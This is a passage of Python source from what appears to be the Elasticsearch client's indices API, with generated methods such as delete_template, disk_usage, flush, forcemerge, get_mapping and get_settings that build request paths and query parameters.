) -> ObjectApiResponse[Any]:
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def delete_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
timeout: Optional[Any] = None,
) -> ObjectApiResponse[Any]:
"""
Deletes an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The name of the template
:param master_timeout: Specify timeout for connection to master
:param timeout: Explicit operation timeout
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if timeout is not None:
__query["timeout"] = timeout
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("DELETE", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def disk_usage(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flush: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
run_expensive_tasks: Optional[bool] = None,
timeout: Optional[Any] = None,
wait_for_active_shards: Optional[str] = None,
) -> ObjectApiResponse[Any]:
"""
Analyzes the disk usage of each field of an index or data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html>`_
:param index: Comma-separated list of data streams, indices, and aliases used
to limit the request. It’s recommended to execute this API with a single
index (or the latest backing index of a data stream) as the API consumes
resources significantly.
:param allow_no_indices: If false, the request returns an error if any wildcard
expression, index alias, or _all value targets only missing or closed indices.
This behavior applies even if the request targets other open indices. For
example, a request targeting foo*,bar* returns an error if an index starts
with foo but no index starts with bar.
:param expand_wildcards: Type of index that wildcard patterns can match. If the
request can target data streams, this argument determines whether wildcard
expressions match hidden data streams. Supports comma-separated values, such
as open,hidden.
:param flush: If true, the API performs a flush before analysis. If false, the
response may not include uncommitted data.
:param ignore_unavailable: If true, missing or closed indices are not included
in the response.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
:param run_expensive_tasks: Analyzing field disk usage is resource-intensive.
To use the API, this parameter must be set to true.
:param timeout: Period to wait for a response. If no response is received before
the timeout expires, the request fails and returns an error.
:param wait_for_active_shards: The number of shard copies that must be active
before proceeding with the operation. Set to all or any positive integer
up to the total number of shards in the index (number_of_replicas+1). Default:
1, the primary shard.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}/_disk_usage"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flush is not None:
__query["flush"] = flush
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if run_expensive_tasks is not None:
__query["run_expensive_tasks"] = run_expensive_tasks
if timeout is not None:
__query["timeout"] = timeout
if wait_for_active_shards is not None:
__query["wait_for_active_shards"] = wait_for_active_shards
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-exists.html>`_
:param index: A comma-separated list of index names
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Ignore unavailable indexes (default: false)
:param include_defaults: Whether to return all default setting for each of the
indices.
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_alias(
self,
*,
name: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular alias exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param name: A comma-separated list of alias names to return
:param index: A comma-separated list of index names to filter aliases
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
elif name not in SKIP_IN_PATH:
__path = f"/_alias/{_quote(name)}"
else:
raise ValueError("Couldn't find a path for the given parameters")
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_index_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Comma-separated list of index template names used to limit the request.
Wildcard (*) expressions are supported.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_index_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def exists_template(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> HeadApiResponse:
"""
Returns information about whether a particular index template exists.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The comma separated names of the index templates
:param flat_settings: Return settings in flat format (default: false)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Explicit operation timeout for connection to master node
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_template/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("HEAD", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def flush(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
force: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
pretty: Optional[bool] = None,
wait_if_ongoing: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the flush operation on one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-flush.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
for all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param force: Whether a flush should be forced even if it is not necessarily
needed ie. if no changes will be committed to the index. This is useful if
transaction log IDs should be incremented even if no uncommitted changes
are present. (This setting can be considered as internal)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param wait_if_ongoing: If set to true the flush operation will block until the
flush can be executed if another flush operation is already executing. The
default is true. If set to false the flush will be skipped iff if another
flush operation is already running.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_flush"
else:
__path = "/_flush"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if force is not None:
__query["force"] = force
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if pretty is not None:
__query["pretty"] = pretty
if wait_if_ongoing is not None:
__query["wait_if_ongoing"] = wait_if_ongoing
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def forcemerge(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flush: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
max_num_segments: Optional[int] = None,
only_expunge_deletes: Optional[bool] = None,
pretty: Optional[bool] = None,
wait_for_completion: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Performs the force merge operation on one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-forcemerge.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flush: Specify whether the index should be flushed after performing the
operation (default: true)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param max_num_segments: The number of segments the index should be merged into
(default: dynamic)
:param only_expunge_deletes: Specify whether the operation should only expunge
deleted documents
:param wait_for_completion: Should the request wait until the force merge is
completed.
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_forcemerge"
else:
__path = "/_forcemerge"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flush is not None:
__query["flush"] = flush
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if max_num_segments is not None:
__query["max_num_segments"] = max_num_segments
if only_expunge_deletes is not None:
__query["only_expunge_deletes"] = only_expunge_deletes
if pretty is not None:
__query["pretty"] = pretty
if wait_for_completion is not None:
__query["wait_for_completion"] = wait_for_completion
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns information about one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-index.html>`_
:param index: Comma-separated list of data streams, indices, and index aliases
used to limit the request. Wildcard expressions (*) are supported.
:param allow_no_indices: Ignore if a wildcard expression resolves to no concrete
indices (default: false)
:param expand_wildcards: Type of index that wildcard expressions can match. If
the request can target data streams, this argument determines whether wildcard
expressions match hidden data streams. Supports comma-separated values, such
as open,hidden.
:param flat_settings: If true, returns settings in flat format.
:param ignore_unavailable: If false, requests that target a missing index return
an error.
:param include_defaults: If true, return all default settings in the response.
:param local: If true, the request retrieves information from the local node
only. Defaults to false, which means information is retrieved from the master
node.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if index in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'index'")
__path = f"/{_quote(index)}"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_alias(
self,
*,
index: Optional[Any] = None,
name: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an alias.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html>`_
:param index: A comma-separated list of index names to filter aliases
:param name: A comma-separated list of alias names to return
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias/{_quote(name)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_alias"
elif name not in SKIP_IN_PATH:
__path = f"/_alias/{_quote(name)}"
else:
__path = "/_alias"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_data_stream(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns data streams.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: A comma-separated list of data streams to get; use `*` to get all
data streams
:param expand_wildcards: Whether wildcard expressions should get expanded to
open or closed indices (default: open)
"""
if name not in SKIP_IN_PATH:
__path = f"/_data_stream/{_quote(name)}"
else:
__path = "/_data_stream"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_field_mapping(
self,
*,
fields: Any,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns mapping for one or more fields.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-field-mapping.html>`_
:param fields: A comma-separated list of fields
:param index: A comma-separated list of index names
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param include_defaults: Whether the default mapping values should be returned
as well
:param local: Return local information, do not retrieve the state from master
node (default: false)
"""
if fields in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'fields'")
if index not in SKIP_IN_PATH and fields not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_mapping/field/{_quote(fields)}"
elif fields not in SKIP_IN_PATH:
__path = f"/_mapping/field/{_quote(fields)}"
else:
raise ValueError("Couldn't find a path for the given parameters")
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_index_template(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: Comma-separated list of index template names used to limit the request.
Wildcard (*) expressions are supported.
:param flat_settings: If true, returns settings in flat format.
:param local: If true, the request retrieves information from the local node
only. Defaults to false, which means information is retrieved from the master
node.
:param master_timeout: Period to wait for a connection to the master node. If
no response is received before the timeout expires, the request fails and
returns an error.
"""
if name not in SKIP_IN_PATH:
__path = f"/_index_template/{_quote(name)}"
else:
__path = "/_index_template"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_mapping(
self,
*,
index: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns mappings for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-mapping.html>`_
:param index: A comma-separated list of index names
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Specify timeout for connection to master
"""
if index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_mapping"
else:
__path = "/_mapping"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_settings(
self,
*,
index: Optional[Any] = None,
name: Optional[Any] = None,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
include_defaults: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns settings for one or more indices.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-settings.html>`_
:param index: A comma-separated list of index names; use `_all` or empty string
to perform the operation on all indices
:param name: The name of the settings that should be included
:param allow_no_indices: Whether to ignore if a wildcard indices expression resolves
into no concrete indices. (This includes `_all` string or when no indices
have been specified)
:param expand_wildcards: Whether to expand wildcard expression to concrete indices
that are open, closed or both.
:param flat_settings: Return settings in flat format (default: false)
:param ignore_unavailable: Whether specified concrete indices should be ignored
when unavailable (missing or closed)
:param include_defaults: Whether to return all default setting for each of the
indices.
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Specify timeout for connection to master
"""
if index not in SKIP_IN_PATH and name not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings/{_quote(name)}"
elif index not in SKIP_IN_PATH:
__path = f"/{_quote(index)}/_settings"
elif name not in SKIP_IN_PATH:
__path = f"/_settings/{_quote(name)}"
else:
__path = "/_settings"
__query: Dict[str, Any] = {}
if allow_no_indices is not None:
__query["allow_no_indices"] = allow_no_indices
if error_trace is not None:
__query["error_trace"] = error_trace
if expand_wildcards is not None:
__query["expand_wildcards"] = expand_wildcards
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if ignore_unavailable is not None:
__query["ignore_unavailable"] = ignore_unavailable
if include_defaults is not None:
__query["include_defaults"] = include_defaults
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def get_template(
self,
*,
name: Optional[Any] = None,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
flat_settings: Optional[bool] = None,
human: Optional[bool] = None,
local: Optional[bool] = None,
master_timeout: Optional[Any] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Returns an index template.
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-templates.html>`_
:param name: The comma separated names of the index templates
:param flat_settings: Return settings in flat format (default: false)
:param local: Return local information, do not retrieve the state from master
node (default: false)
:param master_timeout: Explicit operation timeout for connection to master node
"""
if name not in SKIP_IN_PATH:
__path = f"/_template/{_quote(name)}"
else:
__path = "/_template"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if flat_settings is not None:
__query["flat_settings"] = flat_settings
if human is not None:
__query["human"] = human
if local is not None:
__query["local"] = local
if master_timeout is not None:
__query["master_timeout"] = master_timeout
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("GET", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def migrate_to_data_stream(
self,
*,
name: Any,
error_trace: Optional[bool] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
pretty: Optional[bool] = None,
) -> ObjectApiResponse[Any]:
"""
Migrates an alias to a data stream
`<https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html>`_
:param name: The name of the alias to migrate
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for parameter 'name'")
__path = f"/_data_stream/_migrate/{_quote(name)}"
__query: Dict[str, Any] = {}
if error_trace is not None:
__query["error_trace"] = error_trace
if filter_path is not None:
__query["filter_path"] = filter_path
if human is not None:
__query["human"] = human
if pretty is not None:
__query["pretty"] = pretty
if __query:
__target = f"{__path}?{_quote_query(__query)}"
else:
__target = __path
__headers = {"accept": "application/json"}
return self._perform_request("POST", __target, headers=__headers) # type: ignore[no-any-return,return-value]
@_rewrite_parameters()
def open(
self,
*,
index: Any,
allow_no_indices: Optional[bool] = None,
error_trace: Optional[bool] = None,
expand_wildcards: Optional[Any] = None,
filter_path: Optional[Union[List[str], str]] = None,
human: Optional[bool] = None,
ignore_unavailable: Optional[bool] = None,
master_timeout: Optional[Any] = None,
